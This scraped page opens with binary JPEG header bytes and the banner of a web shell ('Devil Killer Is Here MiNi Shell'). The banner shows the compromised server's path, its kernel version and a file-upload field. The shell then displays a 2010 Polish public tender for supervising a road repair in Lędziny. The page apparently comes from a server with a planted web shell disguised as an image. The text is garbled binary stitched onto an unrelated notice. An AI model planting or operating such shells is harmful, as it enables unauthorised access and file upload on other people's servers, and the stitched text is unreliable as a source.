JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100713/186223-N-2010.html

<p class="kh_header"><b>Bieruń: Nadzór inwestorski nad realizacją inwestycji pn.: Remont drogi powiatowej 5909S, ul. Lędzińskiej w Lędzinach   z zastosowaniem cichych asfaltów</b><br>
<b>Numer ogłoszenia: 186223 - 2010; data zamieszczenia: 13.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bieruńsko-Lędziński , ul. Jagiełły 1, 43-155 Bieruń, woj. śląskie, tel. 032 2163820, faks 032 3269287.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad realizacją inwestycji pn.: Remont drogi powiatowej 5909S, ul. Lędzińskiej w Lędzinach   z zastosowaniem cichych asfaltów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi polegającej na pełnieniu funkcji inspektora nadzoru inwestorskiego dla zadania inwestycyjnego pn.: Remont drogi powiatowej 5909 S, ul. Lędzińskiej w Lędzinach z zastosowaniem cichych asfaltów, realizowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013
Priorytet VII. Transport
Działanie 7.1. Modernizacja i rozbudowa sieci drogowej 
Poddziałanie 7.1.2. Modernizacja i rozbudowa infrastruktury uzupełniającej kluczową sieć drogową.

Zakres robót budowlanych dla ww. zadania inwestycyjnego obejmują nw. dokumenty: 
1)	dokumentacja projektowa - projekt budowlany 
Na dokumentację projektową składają się następujące opracowania:
1.	część opisowa zawierająca projekt techniczny,
2.	Plan orientacyjny (nr rys. 1),
3.	Plan sytuacyjny cz. 1 (nr rys. 2.1),
4.	Plan sytuacyjny cz. 2 (nr rys. 2.2),
5.	Profil podłużny ul. Lędzińskiej (nr rys. 3),
6.	Przekroje normalne (nr rys. 4),
7.	Przekroje poprzeczne nakładki (nr rys. 5),
8.	Rysunek ulicznego wpustu deszczowego (nr rys. 6).
2)	Przedmiar robót zawierający m.in. rodzaj robót przewidzianych podczas realizacji niniejszego zamówienia oraz ich dokładną ilość; 
3)	specyfikacja techniczna wykonania i odbioru robót budowlanych (w części zawierającej zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące wymagania w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót). Na specyfikację techniczną wykonania i odbioru robót budowlanych składają się następujące opracowania: 
1.	Wymagania ogólne,
2.	Opcjonalne uzupełnienie ogólnych specyfikacji technicznych nawierzchni i podbudów asfaltowych obejmujące pełny zakres powołań na wymagania techniczne,
3.	Roboty przygotowawcze,
4.	Roboty ziemne,
5.	Frezowanie nawierzchni asfaltowych na zimno,
6.	Nawierzchnia z betonu asfaltowego,
7.	Nawierzchnia z mieszanki mastyksowo-grysowej (SMA),
8.	Chodniki,
9.	Betonowe obrzeża chodnikowe,
10.	Krawężniki,
11.	Ustawienie krawężników betonowych,
12.	Wjazdy do posesji,
13.	Kanalizacja deszczowa,
14.	Oznakowanie pionowe,
15.	Oznakowanie poziome.

Do obowiązków inspektora nadzoru w ramach ww. zadania należeć będzie pełny zakres czynności, jaki dla Inspektora Nadzoru  przewiduje art. 25, 26 i 27  aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. - Prawo budowlane i ponadto:
a)	   Kontrola zgodności wykonania robót budowlanych pod względem technicznym, materiałowym, użytkowym i ekonomicznym, z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, pozwoleniem na budowę z przepisami techniczno-budowlanymi, normami,               a także z zasadami wiedzy technicznej;
b)	   Sprawdzenie jakości wykonanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczalnych do stosowania w budownictwie;
c)	   Koordynacja robót poszczególnych branż;
d)	   Sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie wspólnie z Zamawiającym w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział             w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
e)	   Przedkładanie na bieżąco dokumentacji fotograficznej w wersji elektronicznej z wykonanych robót budowlanych ulegających zakryciu lub zanikających;
f)	   Potwierdzenie faktycznie wykonanych robót oraz usunięcia wad;
g)	   Sprawdzenie dokumentów przedłożonych przez Wykonawcę do odbiorów częściowych i odbioru końcowego;
h)	   Przeprowadzanie rozliczenia wykonanych i odebranych robót, zgodnie z umową  z Wykonawcą, a w szczególności: czynności kontrolne i weryfikacja faktur;
i)	   Potwierdzenie gotowość do odbioru, dokonanie odbioru w obecności Zamawiającego i wykonawcy robót, sprawdzenie i weryfikacja obmiarów i kosztorysów;
j)	   Na wezwanie Zamawiającego składanie pisemnych raportów o stanie zaawansowania inwestycji (postępie robót), uzyskiwanym poziomie jakości robót, postępie finansowym oraz występujących trudnościach w realizacji budowy i odstępstwach od umowy zawartej przez Zamawiającego                              z Wykonawcą,
k)	   Dokonywanie analizy i zatwierdzanie harmonogramów rzeczowo-finansowych;
l)	   Uczestniczenie w spotkania organizowanych przez wykonawcę robót oraz sporządzanie protokołów z narad;
m)	   Prowadzenie nadzoru inwestorskiego w przypadku wystąpienia robót dodatkowych na ww. zasadach;
n)	   Dokonywanie przeglądów w okresie gwarancji, który wynosi 60 miesięcy od dnia odbioru końcowego robót objętych przedmiotem niniejszego zamówienia;
o)	   Innych czynności, które są konieczne do wykonania robót budowlanych, dla przedmiotowej inwestycji.

Ponadto przedmiotowe zamówienie należy zrealizować (wykonać) zgodnie z aktualnie obowiązującymi przepisami oraz postanowieniami umowy.
Zamawiający posiada aktualne pozwolenie na budowę (DECYZJA NR : 32/Lę/2010 o pozwoleniu na budowę, wydana w dniu 31 marca 2010 r. Znak: BA-7351/17/Lę/2010).

Miejsce wykonania usługi: droga powiatowa 5909 S, ul. Lędzińska w Lędzinach na odcinku w km drogi od 2+177,00 do 3+874,59, Powiat Bieruńsko-Lędziński, województwo śląskie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewidywane zamówienia uzupełniające będą zgodne z przedmiotem zamówienia podstawowego określonego w pkt.: II.1.1) -  II.1.3) niniejszego ogłoszenia  i polegać będą na powtórzeniu tego samego rodzaju zamówienia, a w szczególności do obowiązków inspektora nadzoru w ramach ww. zadania należeć będzie pełny zakres czynności, jaki dla Inspektora Nadzoru  przewiduje art. 25, 26 i 27  aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. - Prawo budowlane i ponadto:
a)	Kontrola zgodności wykonania robót budowlanych pod względem technicznym, materiałowym, użytkowym i ekonomicznym, z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, pozwoleniem na budowę z przepisami techniczno-budowlanymi, normami, a także z zasadami wiedzy technicznej;
b)	Sprawdzenie jakości wykonanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczalnych do stosowania w budownictwie;
c)	Koordynacja robót poszczególnych branż;
d)	Sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie wspólnie z Zamawiającym w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział             w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
e)	Przedkładanie na bieżąco dokumentacji fotograficznej w wersji elektronicznej z wykonanych robót budowlanych ulegających zakryciu lub zanikających;
f)	Potwierdzenie faktycznie wykonanych robót oraz usunięcia wad;
g)	Sprawdzenie dokumentów przedłożonych przez Wykonawcę do odbiorów częściowych i odbioru końcowego;
h)	Przeprowadzanie rozliczenia wykonanych i odebranych robót, zgodnie z umową  z Wykonawcą, a w szczególności: czynności kontrolne i weryfikacja faktur;
i)	Potwierdzenie gotowość do odbioru, dokonanie odbioru w obecności Zamawiającego i wykonawcy robót, sprawdzenie i weryfikacja obmiarów i kosztorysów;
j)	 Na wezwanie Zamawiającego składanie pisemnych raportów o stanie zaawansowania inwestycji (postępie robót), uzyskiwanym poziomie jakości robót, postępie finansowym oraz występujących trudnościach w realizacji budowy i odstępstwach od umowy zawartej przez Zamawiającego z Wykonawcą,
k)	Dokonywanie analizy i zatwierdzanie harmonogramów rzeczowo-finansowych;
l)	Uczestniczenie w spotkania organizowanych przez wykonawcę robót oraz sporządzanie protokołów z narad;
m)	Prowadzenie nadzoru inwestorskiego w przypadku wystąpienia robót dodatkowych na ww. zasadach;
n)	Dokonywanie przeglądów w okresie gwarancji, który wynosi 60 miesięcy od dnia odbioru końcowego robót objętych przedmiotem niniejszego zamówienia;
o)	Innych czynności, które są konieczne do wykonania robót budowlanych, dla przedmiotowej inwestycji.
Wartość zamówień uzupełniających nie stanowi więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy wykażą, że wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej jedną usługę polegającą na pełnieniu nadzoru inwestorskiego nad budową, remontem albo przebudową drogi publicznej wraz z ułożeniem, przebudową albo remontem chodnika, budową, przebudową albo remontem kanalizacji deszczowej lub sanitarnej, wykonaniem oznakowania pionowego i poziomego o wartości nadzorowanych robót nie mniejszej niż 500.000,00 zł brutto, 

Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie dokumentu wymienionego w pkt. III.4. (Informacja o oświadczeniach lub dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy).       

Ponadto potwierdzenia spełnienia warunku udziału w niniejszym postępowaniu, Zamawiający dokona na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy p.z.p.
 Warunek będzie oceniany przez Zamawiającego zgodnie  z formułą spełnia/nie spełnia. Podstawą oceny będą oświadczenia  i dokumenty dołączone przez wykonawcę do oferty potwierdzające ich spełnianie.
Z treści załączonych oświadczeń i dokumentów musi wynikać jednoznacznie, iż warunki wykonawca spełnił.

Uwaga : 
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że warunek określony w pkt. III.3.2) niniejszego ogłoszenia spełnia przynajmniej jeden z wykonawców albo łącznie wszyscy wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, co oznacza, że dysponują:  
-	Osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń albo drogowej, która pełnić będzie funkcję inspektora nadzoru inwestorskiego;

Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie dokumentu   wymienionego w pkt. III.4. (Informacja o oświadczeniach lub dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy).       

Ponadto potwierdzenia spełnienia warunku udziału w niniejszym postępowaniu, Zamawiający dokona na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy p.z.p.
 Warunek będzie oceniany przez Zamawiającego zgodnie  z formułą spełnia/nie spełnia. Podstawą oceny będą oświadczenia  i dokumenty dołączone przez wykonawcę do oferty potwierdzające ich spełnianie.
Z treści załączonych oświadczeń i dokumentów musi wynikać jednoznacznie, iż warunki wykonawca spełnił.

Uwaga : 
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że warunek określony w pkt. III.3.4) spełnia przynajmniej jeden z wykonawców albo łącznie wszyscy wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia lub dokumenty niezbędne do przeprowadzenia postępowania:
1.	Formularz ofertowy wykonawcy;
2.	Oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy p.z.p.
3.	Stosowne pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo reprezentowaniu wykonawcy w postępowaniu i zawarciu umowy, jeżeli osoba(y) reprezentująca(e) wykonawcę w postępowaniu o udzielenie zamówienia nie jest(są) wskazana(e) jako upoważniona(e) do jego reprezentacji we właściwym rejestrze.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszyć postanowień zawartych w art. 144 ustawy p.z.p.
Zamawiający przewiduje możliwość dokonania zmian w stosunku do treści oferty na podstawie, której dokonał wyboru Wykonawcy, o którym mowa w umowie  w przypadku wystąpienia niżej wymienionych okoliczności w trakcie realizacji przedmiotowej umowy:
a)	ceny netto określone w ofercie pozostają niezmienne przez cały okres obowiązywania umowy. Jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), od chwili zmiany podatek w nowej stawce będzie doliczany do dotychczasowych cen netto.
b)	przesunięcie terminu wykonania przedmiotowej usługi będzie możliwe jedynie w sytuacji przedłużenia terminu wykonania nadzorowanych robót budowlanych.
W takim przypadku przedłużenie terminu zakończenia usługi może ulec o czas niezbędny na wykonanie tych robót.
c)	termin realizacji nadzoru inwestorskiego może ulec zmianie w sytuacji jeżeli inwestycja nie zostanie zakończona i rozliczona, w takim przypadku termin zostanie przedłużony do czasu zakończenia lub rozliczenia inwestycji, tj.  rozliczenia ostatniego wniosku o płatność składanego o dofinansowanie projektu ze środków EFRR w ramach RPO WSL na lata 2007-2013 (poddziałanie 7.1.2. Modernizacja             i rozbudowa infrastruktury uzupełniającej kluczową sieć drogową).
d)	w przypadku wystąpienia okoliczności uniemożliwiających osobie pełniącej funkcję inspektora nadzoru wykonywanie tej funkcji (śmierć, choroba, utrata uprawnień, nienależyte wykonywanie obowiązków) zmiana może nastąpić na pisemny, uzasadniony wniosek wykonawcy, pod warunkiem, że wskazana osoba spełniać będzie wymagania określone w specyfikacji istotnych warunków zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiatbl.bip.net.pl/.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Bieruniu, ul. Warszawska 168, 43-155 Bieruń, pok. 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.07.2010 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Bieruniu, 43-155 Bieruń, ul. Warszawska 168, sekretariat - pokój nr 2..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013
Priorytet VII. Transport
Działanie 7.1. Modernizacja i rozbudowa sieci drogowej 
Poddziałanie 7.1.2. Modernizacja i rozbudowa infrastruktury uzupełniającej kluczową sieć drogową.

Informacje o sposobie porozumiewania się zamawiającego z wykonawcami oraz przekazywania oświadczeń lub dokumentów, a także wskazanie osób uprawnionych do porozumiewania się z wykonawcami 
1. Wszystkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający  i wykonawcy przekazują pisemnie w języku polskim. 
Zamawiający dopuszcza również przekazanie oświadczeń, wniosków, zawiadomień oraz informacji faksem na nr: (32) 216-21-73.
